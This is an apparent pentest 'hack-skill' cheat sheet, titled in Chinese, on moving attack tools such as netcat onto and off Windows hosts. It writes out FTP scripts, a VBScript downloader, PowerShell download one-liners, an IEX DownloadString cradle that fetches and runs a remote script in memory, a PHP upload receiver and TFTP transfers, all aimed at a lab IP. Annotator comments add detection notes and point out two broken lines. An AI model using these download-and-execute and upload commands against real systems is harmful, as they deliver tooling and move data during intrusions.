
hack-skill

windows shell 中文乱码

REM Switch the console code page to UTF-8 (65001) so multibyte output (e.g. Chinese) is not garbled.
chcp 65001

upx && exe2hex 传输文件

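# Shrink the binary, convert it to a hex text form, and put that text on the clipboard.
# Defender note: UPX-packed PE files are a frequent packer-heuristic hit for AV/EDR,
# and the generated nc.cmd (which rebuilds the binary on the receiving host) is an
# on-disk artifact worth looking for.
upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
# Feed the file to xclip by redirection instead of piping it through cat.
xclip -selection clipboard < nc.cmd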

ftp 传输文件

REM Build an ftp command script line by line, then run it non-interactively
REM (-n: no auto-login, -s: read commands from the file, -v: verbose).
REM Security notes (reviewer): the user name and password end up in ftp.txt in
REM clear text and FTP itself is unencrypted, so both the file on disk and the
REM "ftp -s:" command line are artifacts a defender can audit for.
echo open 192.168.0.2 21> ftp.txt
echo USER d2x3>> ftp.txt
echo passwd>> ftp.txt
REM "bin" switches the transfer to binary mode before fetching the executable.
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
REM NOTE(review): "byte" is not an ftp command; the session-ending command is "bye".
echo byte >> ftp.txt

ftp -v -n -s:ftp.txt

vbs 传输文件

REM Write a small VBScript downloader (wget.vbs) one line at a time, then run it
REM with cscript as: cscript wget.vbs <URL> <destination>.
REM The script fetches the URL with MSXML2.ServerXMLHTTP, and on HTTP 200 writes the
REM response body to disk through an ADODB.Stream in binary mode (Type = 1), deleting
REM an existing destination file first.
REM Defender note: wget.vbs is written to disk and cscript.exe is launched with a URL
REM on its command line -- both show up in file and process-creation auditing.
echo URL = WScript.Arguments(0)> wget.vbs
echo saveTo = WScript.Arguments(1)>> wget.vbs
echo Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")>> wget.vbs
echo objXMLHTTP.open "GET", URL, false>> wget.vbs
echo objXMLHTTP.send()>> wget.vbs
echo If objXMLHTTP.Status = 200 Then>> wget.vbs
echo Set objADOStream = CreateObject("ADODB.Stream")>> wget.vbs
echo objADOStream.Open>> wget.vbs
echo objADOStream.Type = 1 >> wget.vbs
echo objADOStream.Write objXMLHTTP.ResponseBody>> wget.vbs
echo objADOStream.Position = 0>> wget.vbs
echo Set objFSO = Createobject("Scripting.FileSystemObject")>> wget.vbs
echo If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo>> wget.vbs
echo Set objFSO = Nothing>> wget.vbs
echo objADOStream.SaveToFile saveTo>> wget.vbs
echo objADOStream.Close>> wget.vbs
echo Set objADOStream = Nothing>> wget.vbs
echo End if>> wget.vbs
echo Set objXMLHTTP = Nothing>> wget.vbs
echo WScript.Quit>> wget.vbs

cscript wget.vbs http://192.168.31.80:8000/nc.exe nc.exe

powershell 传输文件

REM Write a four-line PowerShell downloader and execute it with the execution policy bypassed.
REM These echo lines run under cmd, which does not expand "$" variables, so the
REM PowerShell text is written literally.
REM Defender note: "-ExecutionPolicy Bypass" together with "-NoLogo -NonInteractive
REM -NoProfile" on a command line is a common hunting signature; with PowerShell
REM script block logging enabled the content of wget.ps1 is recorded when it runs.
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://192.168.31.80:8000/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

#一句话
REM One-liner download launched from cmd; the triple quotes are cmd's way of passing
REM literal double quotes through to PowerShell.
REM Security note: assigning {$true} to ServerCertificateValidationCallback disables
REM TLS certificate validation for the whole process, so even an https source is not
REM protected against interception. $response is always empty because
REM WebClient.DownloadFile returns nothing.
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source="""http://192.168.31.80:8000/nc.exe"""; $destination="""nc.exe"""; $http=new-object System.Net.WebClient; $response=$http.DownloadFile($source,$destination);"

#一句话2
REM Shortest form: the expression is parsed straight from powershell.exe's argument list.
REM The local name ("ncccc.exe") deliberately differs from the remote file name.
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.80:8000/nc.exe', 'ncccc.exe')

powershell 执行脚本

REM Download-and-run in memory: the script text is handed to Invoke-Expression (IEX)
REM without being written to disk first.
REM Defender note: the "New-Object Net.WebClient ... DownloadString" into IEX download
REM cradle is one of the most widely signatured PowerShell command lines; script block
REM logging still captures the fetched code because it logs what is executed, not
REM what is read from disk.
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.31.80:8000/helloworld.ps1')

php 传输文件

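<?php
// Minimal upload receiver (the PowerShell UploadFile call below posts to it).
// $_FILES['file']['name'] is chosen by the client, so strip any directory part
// with basename() to keep the destination inside $uploaddir, and reject requests
// that carry no file at all instead of raising notices on a missing key.
// Nothing here restricts file type or size; an existing file of the same name
// is overwritten.
if (!isset($_FILES['file'])) {
    http_response_code(400);
    exit;
}
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>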
REM Upload a local file to the receiver above via an HTTP POST.
REM NOTE(review): the second argument lacks its closing single quote, so as written
REM PowerShell cannot parse this line.
powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.31.80/upload.php', 'evil.exe)

tftp 传输文件

#server
# Install atftp, create the served directory and start the daemon on UDP/69.
# The chown to "nobody" is presumably so the unprivileged daemon user can write
# into /tftp -- confirm against atftpd's documentation.
# Defender note: TFTP has no authentication; any host that can reach UDP/69 can
# read from (and, as shown below, write to) this directory.
sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp

#client
REM Windows tftp.exe client: -i selects binary (octet) mode, "put" sends stuff.exe
REM to the listener above.
REM Defender note: on current Windows versions the TFTP client is an optional feature
REM that is off by default, so tftp.exe executing, or outbound UDP/69, is unusual.
tftp -i 192.168.31.80 put stuff.exe
